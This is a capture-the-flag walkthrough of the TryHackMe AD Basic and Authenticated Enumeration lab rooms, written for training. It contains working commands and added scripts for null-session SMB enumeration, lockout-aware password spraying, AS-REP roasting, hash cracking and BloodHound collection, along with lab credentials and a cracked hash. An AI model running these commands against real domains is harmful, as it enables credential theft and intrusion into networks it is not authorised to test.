AD: Basic & Authenticated Enumeration TryHackMe Walkthrough
TL;DR Walkthrough of the TryHackMe rooms AD: Basic Enumeration and AD: Authenticated Enumeration. Neither room was very long, so I combined them into one walkthrough.
AD: Authenticated Enumeration room
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I am going through a suggested learning path currently, knocking out rooms I hadn’t already done and brushing up on topics like webapps that I suck at. These two AD enumeration rooms are new. I didn’t see any walkthroughs for them yet, so I figured I might as well write one.
Both rooms consist of a very small domain with two systems:
10.211.11.20 Workstation
10.211.11.10 DC
The Authenticated Enumeration room hands out the same two hosts on 10.211.12.x instead (10.211.12.20 and 10.211.12.10), which is why the IPs change partway through this walkthrough.
Without further ado, let’s get started.
— — Task 1 — -
I am ready to begin exploring unauthenticated enumeration.
No answer needed
— — Task 2 — -
What is the domain name of our target?
sudo nmap -sV -O 10.211.11.10
The domain name shows up in the -sV banner of the LDAP ports (389/636/3268/3269), which nmap reports as Microsoft Windows Active Directory LDAP with the domain in parentheses:
tryhackme.loc
What version of Windows Server is running on the DC?
Windows Server 2019 Datacenter
— — Task 3 — -
What is the flag hidden in one of the shares?
THM{88_SMB_88}
The DC allows anonymous (null-session) SMB/RPC enumeration, so enum4linux alone gathers quite a bit of information.
enum4linux 10.211.11.10
Shares:
- AnonShare
- SharedFiles
- UserBackups
Lockout Duration = 2 min
Lockout Threshold = 10
smbclient \\\\10.211.11.10\\SharedFiles -N
This just has a .txt file with a USB story.
smbclient \\\\10.211.11.10\\UserBackups -N
ls
more flag.txt
THM{88_SMB_88}
smbclient \\\\10.211.11.10\\AnonShare -N
This share was empty.
— — Task 4 — -
What group is the user rduke part of?
enum4linux 10.211.11.10 > DomainEnum.txt
Then just Ctrl + F the text file for rduke.
Domain Users
What is this user’s full name?
Raoul Duke
Which username is associated with RID 1634?
enum4linux prints RIDs in hex; 1634 is 0x662, so Ctrl + F for 0x662 finds:
katie.thomas
— — Task 5 — -
What is the minimum password length?
7
What is the locked account duration?
2 minutes
This information also comes from enum4linux.
Perform password spraying using CrackMapExec. What valid credentials did you find? (format: username:password)
crackmapexec smb 10.211.11.10 -u TryHackMeUsers.txt -p PasswordsToTry.txt --continue-on-success
tryhackme.loc\rduke:Password1!
I copy/pasted the portion of DomainEnum.txt that contains all the usernames, then parsed out the SamAccountNames in PowerShell.
# Users.txt holds the enum4linux lines that contain DOMAIN\username; keep the part
# after the backslash up to the first space, which is the SamAccountName.
# -Encoding ascii matters: Windows PowerShell 5.1's Out-File writes UTF-16 by default,
# which crackmapexec on Kali cannot read.
Get-Content ".\Users.txt" |
    Where-Object { $_ -match '\\' } |
    ForEach-Object { ($_.Split("\")[1]).Split(" ")[0] } |
    Out-File .\TryHackMeUsers.txt -Encoding ascii
I copy/pasted the passwords TryHackMe suggested using into PasswordsToTry.txt. Check that list against the lockout threshold of 10 from Task 5 before spraying: every password in the file counts against each user's badPwdCount, so keep the list shorter than the threshold, or split it into batches spaced by the lockout-counter reset window that enum4linux prints alongside the threshold. Otherwise the spray locks out the entire user list.
Please note: if you copy the files themselves from Windows to Kali, crackmapexec will error on them, because Windows PowerShell 5.1's Out-File writes UTF-16 with a byte-order mark and CRLF line endings by default. Either pass -Encoding ascii to Out-File, run dos2unix on the files in Kali, or open the files, hit Ctrl + A -> Ctrl + C, and paste the contents into a freshly created blank file on Kali.
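Tasks 4 and 5 come down to text-munging enum4linux output and then spraying without locking anyone out, so here is an added bash example that scripts both. It is not code from the room or from the original walkthrough: it parses a constructed enum4linux excerpt (the `user:[name] rid:[0x...]` lines and the password-policy lines), answers the RID 1634 lookup without converting hex by hand, and splits a password list into batches that stay below the lockout threshold, printing the crackmapexec command for each batch with a pause covering the lockout-counter reset window instead of executing anything. The sample output, the password list, the target IP and the file names are all assumptions.

```shell
#!/usr/bin/env bash
# Added example, not code from the original walkthrough: parse enum4linux output
# offline and plan a password spray that stays under the lockout threshold.
# Every input below is constructed; target IP and file names are assumptions.
set -euo pipefail

# Constructed excerpt in the shape enum4linux prints (password policy + enumdomusers).
ENUM_OUTPUT='[+] Password Info for Domain: TRYHACKME
    [+] Minimum password length: 7
    [+] Reset Account Lockout Counter: 2 minutes
    [+] Locked Account Duration: 2 minutes
    [+] Account Lockout Threshold: 10
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[rduke] rid:[0x450]
user:[katie.thomas] rid:[0x662]'

# Constructed password list, deliberately longer than the lockout threshold.
PASSWORDS='Password1!
Welcome1!
Summer2023!
Winter2023!
Spring2023!
Autumn2023!
Company123!
Changeme1!
Letmein1!
P@ssw0rd
Qwerty123!
Monday01!'

# SamAccountNames from the "user:[name] rid:[0x..]" lines, one per line.
extract_users() {
  printf '%s\n' "$ENUM_OUTPUT" | sed -n 's/^user:\[\([^]]*\)\] rid:\[0x[0-9a-fA-F]*\].*/\1/p'
}

# Decimal RID -> username; enum4linux prints RIDs in hex, so convert first.
rid_to_user() {
  local hex
  hex=$(printf '%x' "$1")
  printf '%s\n' "$ENUM_OUTPUT" | sed -n "s/^user:\[\([^]]*\)\] rid:\[0x${hex}\].*/\1/p"
}

# Account Lockout Threshold (0 means lockout is not configured).
lockout_threshold() {
  printf '%s\n' "$ENUM_OUTPUT" | sed -n 's/.*Account Lockout Threshold: *\([0-9]*\).*/\1/p'
}

# Minutes before a bad-password counter resets ("Reset Account Lockout Counter").
lockout_reset_minutes() {
  printf '%s\n' "$ENUM_OUTPUT" | sed -n 's/.*Reset Account Lockout Counter: *\([0-9]*\) minutes.*/\1/p'
}

password_count() { printf '%s\n' "$PASSWORDS" | grep -c .; }

# Passwords per user per reset window. The margin (assumption: 2) allows for a
# user who already has failed attempts, since badPwdCount is tracked per DC.
safe_batch_size() {
  local threshold=$1 margin=${2:-2}
  [ "$threshold" -gt 0 ] || { echo 0; return; }
  echo $(( threshold - margin ))
}

# Number of batches a list of $2 passwords needs at $1 passwords per batch.
batch_count() { echo $(( ($2 + $1 - 1) / $1 )); }

# Write batch files and print one crackmapexec command per batch, with a pause
# covering the reset window in between. Dry run: nothing is executed here.
plan_spray() {
  local target=$1 users=$2 dir=${3:-$(mktemp -d)} batch reset f n=0
  batch=$(safe_batch_size "$(lockout_threshold)")
  [ "$batch" -gt 0 ] || batch=$(password_count)     # no lockout policy: one batch
  reset=$(lockout_reset_minutes)
  printf '%s\n' "$PASSWORDS" | awk -v n="$batch" -v dir="$dir" \
    '{ f = sprintf("%s/batch_%02d.txt", dir, int((NR - 1) / n) + 1); print > f }'
  for f in "$dir"/batch_*.txt; do
    n=$(( n + 1 ))
    [ "$n" -eq 1 ] || echo "sleep $(( ${reset:-0} * 60 + 30 ))   # reset window plus slack"
    echo "crackmapexec smb $target -u $users -p $f --continue-on-success"
  done
}

# Demo: answer the RID question, then print the spray plan for the DC in this room.
echo "RID 1634 -> $(rid_to_user 1634)"
outdir=$(mktemp -d)
extract_users > "$outdir/TryHackMeUsers.txt"
plan_spray 10.211.11.10 "$outdir/TryHackMeUsers.txt" "$outdir"
```

To run it against a real enumeration, replace the ENUM_OUTPUT literal with `$(cat DomainEnum.txt)`. The margin of 2 is a judgement call rather than a rule: badPwdCount is kept per domain controller, and a user may already have failed logons that anonymous enumeration cannot show you.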
— — Task 6 — -
It is time to proceed to the next room, AD: Authenticated Enumeration.
No answer needed
Note that we can RDP into the domain client VM using the credentials we just found.
xfreerdp /v:10.211.11.20 /u:rduke /p:Password1\! /dynamic-resolution
These credentials work in the next room as well. Pretty handy.
— — AD: Authenticated Enumeration — -
— — Task 1 — -
I am ready to begin exploring authenticated enumeration.
No answer needed
— — Task 2 — -
What flag must be set on an AD account for it to be vulnerable to AS-REP Roasting?
UF_DONT_REQUIRE_PREAUTH (bit 0x400000, decimal 4194304, of the account's userAccountControl attribute)
Which tool automatically identifies roastable users without needing a username list?
Rubeus
What is the Hashcat mode used to crack AS-REP hashes?
18200 (the $23$ in the hash is the encryption type, RC4-HMAC; an AES-encrypted AS-REP hash needs a different hashcat mode)
What is the password of the user asrepuser1?
We went over how to ASREPRoast and how to mitigate it here.
/usr/share/doc/python3-impacket/examples/GetNPUsers.py tryhackme.loc/ -no-pass -usersfile /home/kali/Downloads/Users2.txt
Add -dc-ip 10.211.12.10 if tryhackme.loc does not resolve from Kali. No credentials are needed: with -no-pass the script simply sends an AS-REQ for every name in the list, and the DC hands back an AS-REP for any account that does not require pre-authentication. We get a hit.
$krb5asrep$23$asrepuser1@TRYHACKME.LOC:668c316eb42243f5da0bbb2098c5f4b1$1e4e04a64f50c8b8aed7ca2bd6cf8ca3a37ea5fe2ee46392f40bb943851b6d93eace155858a86c526d27cc1fa63e6bb3bf4b86be07a24cbe40f39c11351e9e2d58dcde9147442917f89d96c0ab30358ad28372f5e160dce3b6a2415a0cad8ebdbf4c161de344b091de50760f17935c50912d8107b4520f522fe94a9040cdabaa49367d4d5564e45880c9f3cdac1018ff7007790e70d8a9e66a6cc2e1532eeaccb6d129888abcb2764cf795a7b3bb79c852d8f157a18ad2d24653900dce7d2527acc129bb89190cef964aafc8f9c8c2b2017ccb5b70a14d29cd194686ddae98f72442a6e8f76ab64c33f5097fa71b
Copy/paste the output into ASREPRoasted.txt and crack it.
hashcat -m 18200 /home/kali/Downloads/ASREPRoasted.txt /usr/share/wordlists/rockyou.txt
asrepuser1 / qwerty123!
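Two checks worth scripting at this point, as an added bash example that is not code from the room, the walkthrough or Impacket: decoding the userAccountControl bit from the Task 2 answer so roastable accounts can be spotted in any LDAP dump that includes that attribute, and parsing the $krb5asrep$ line GetNPUsers.py prints so a hash file only goes to hashcat mode 18200 when the etype really is 23. The userAccountControl values and the shortened hash are constructed; asrepuser1's value is built from NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD and DONT_REQUIRE_PREAUTH.

```shell
#!/usr/bin/env bash
# Added example, not code from the original walkthrough or from Impacket.
# Part 1 decodes the userAccountControl bit that makes an account AS-REP roastable;
# part 2 parses the hash line GetNPUsers.py prints. All inputs are constructed.
set -euo pipefail

UF_ACCOUNTDISABLE=$(( 0x2 ))               # a disabled account yields nothing useful
UF_DONT_REQUIRE_PREAUTH=$(( 0x400000 ))    # 4194304: the flag from Task 2

# Constructed "sAMAccountName userAccountControl" pairs, as an LDAP dump would list them.
# asrepuser1 = NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD + DONT_REQUIRE_PREAUTH (512+65536+4194304)
UAC_DUMP='rduke 512
asrepuser1 4260352
disabledsvc 4194306
Administrator 66048'

# True when DONT_REQUIRE_PREAUTH is set in the given userAccountControl value.
preauth_disabled() { [ $(( $1 & UF_DONT_REQUIRE_PREAUTH )) -ne 0 ]; }

# Accounts worth feeding to GetNPUsers.py: pre-auth not required and not disabled.
roastable_accounts() {
  printf '%s\n' "$UAC_DUMP" | while read -r name uac; do
    if preauth_disabled "$uac" && [ $(( uac & UF_ACCOUNTDISABLE )) -eq 0 ]; then
      echo "$name"
    fi
  done
}

# Constructed AS-REP hash in the hashcat layout GetNPUsers.py emits (ciphertext shortened):
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>
ASREP_SAMPLE='$krb5asrep$23$asrepuser1@TRYHACKME.LOC:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff00112233'

# Split an etype-23 AS-REP line into "etype user realm checksum ciphertext".
# Returns 1 for anything that is not a well-formed RC4 AS-REP hash, so a stray
# line in the file does not silently get the wrong hashcat mode.
asrep_fields() {
  local line=$1 rest etype principal checksum cipher
  case "$line" in '$krb5asrep$'*) ;; *) return 1 ;; esac
  rest=${line#\$krb5asrep\$}
  etype=${rest%%\$*};      rest=${rest#*\$}
  principal=${rest%%:*};   rest=${rest#*:}
  checksum=${rest%%\$*};   cipher=${rest#*\$}
  [ "$etype" = 23 ] || return 1                    # AES variants use a different layout and mode
  case "$checksum$cipher" in *[!0-9a-fA-F]*|'') return 1 ;; esac
  [ "${#checksum}" -eq 32 ] || return 1            # HMAC-MD5 checksum is 16 bytes
  echo "$etype ${principal%@*} ${principal#*@} $checksum $cipher"
}

# The hashcat mode for a validated line; 18200 is "Kerberos 5, etype 23, AS-REP".
hashcat_mode() { asrep_fields "$1" > /dev/null && echo 18200; }

# Demo: list roastable accounts, show the parsed fields, print the crack command.
echo "Roastable: $(roastable_accounts | tr '\n' ' ')"
asrep_fields "$ASREP_SAMPLE"
echo "hashcat -m $(hashcat_mode "$ASREP_SAMPLE") ASREPRoasted.txt /usr/share/wordlists/rockyou.txt"
```

The bit test is the same thing GetNPUsers.py and Rubeus do server-side with an LDAP filter on userAccountControl; having it in a script is handy when you only have a directory export. The parser deliberately rejects non-23 etypes rather than guessing a mode, because an AES AS-REP hash has a different layout and hashcat will refuse or mis-parse it under 18200.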
— — Task 3 — -
How many domain user accounts are there?
I simply used the credentials we got earlier in the Basic Enumeration room.
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution
(Get-ADUser -Filter *).Count
31
#Alternate method, using legacy cmd.exe commands
net user /domain
31
What is the full name of the user rduke?
(Get-ADUser rduke -Properties *).DisplayName
Raoul Duke
How many local user accounts are there on the WRK machine?
(Get-LocalUser).Count
5
How many domain groups are there?
(Get-ADGroup -Filter *).Count
54
The legacy cmd query gives the number that TryHackMe wants; it only lists global groups, which is why the count is so much lower (see the Summary).
net group /domain
21
— — Task 4 — -
What is the distinguishedName value of the asrepuser1 account?
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution
(Get-ADUser asrepuser1).DistinguishedName
CN=asrepuser1,CN=Users,DC=tryhackme,DC=loc
According to the “All Domain Admins” query, how many users are part of the Domain Admins group?
(Get-ADGroupMember "Domain Admins").Count
5
Note that Get-ADGroupMember without -Recursive returns direct members only, so nested group members would be missed here. TryHackMe wants the answer 4, however, as they are not counting the built-in Administrator account (RID 500).
What is the type of relationship (edge) between the DRGONZ0 account and the DOMAIN ADMINS group?
We went over how to get BloodHound up and running on both Windows and Kali here.
mkdir /home/kali/Downloads/AD_Auth_Enum
cd /home/kali/Downloads/AD_Auth_Enum
sudo bloodhound-python -d tryhackme.loc -u rduke -p Password1\! -ns 10.211.12.10 -c all
bloodhound
Upload the files in AD_Auth_Enum and query in BloodHound.
MemberOf
— — Task 5 — -
How many computer accounts were you able to find?
xfreerdp /v:10.211.12.20 /u:rduke /p:Password1\! /dynamic-resolution
(Get-ADComputer -Filter *).Count
2
How many groups did Get-DomainGroup “*admin*” return?
(Get-ADGroup -Filter {Name -like "*admin*"}).Count
13
— — Task 6 — -
I have taken note of the various tools present in this room.
No answer needed
Summary
I was curious why ‘net group /domain’ was returning a much shorter list than ‘Get-ADGroup’. I copy/pasted the output of ‘net group /domain’ into Notepad and saved it as Legacy.txt, then compared the two commands.
# Group names from AD versus the names saved from 'net group /domain' (one name per
# line, with the leading '*' and the header/footer lines removed before saving).
$New = (Get-ADGroup -Filter * -Properties CN).CN
Compare-Object -ReferenceObject $New -DifferenceObject (Get-Content .\Desktop\Legacy.txt)
# Rows marked '<=' are groups only Get-ADGroup returned.
There's our answer: 'net group /domain' only lists global groups, so it skips every domain local group, which includes all the default groups in the Builtin container. 'net localgroup /domain' lists those instead.
I am not sure why this room insisted on including a task centered around legacy cmd.exe commands, or wanted a partial list of groups as the answer to a question.
Not counting Administrator as a member of Domain Admins in Task 4 is also an odd choice. The account is a user and is a member of Domain Admins, after all.
TryHackMe rooms are just janky sometimes. Thankfully it’s not often, and normally pretty easy to work around. Given the price of their subscription I won’t complain much.
References
Howto setup BloodHound: https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b
Howto ASREPRoast: https://happycamper84.medium.com/forging-tickets-abusing-trust-4f1741256ca1
Howto Kerberoast: https://happycamper84.medium.com/kerberoasting-over-an-open-fire-3b604e4c52f2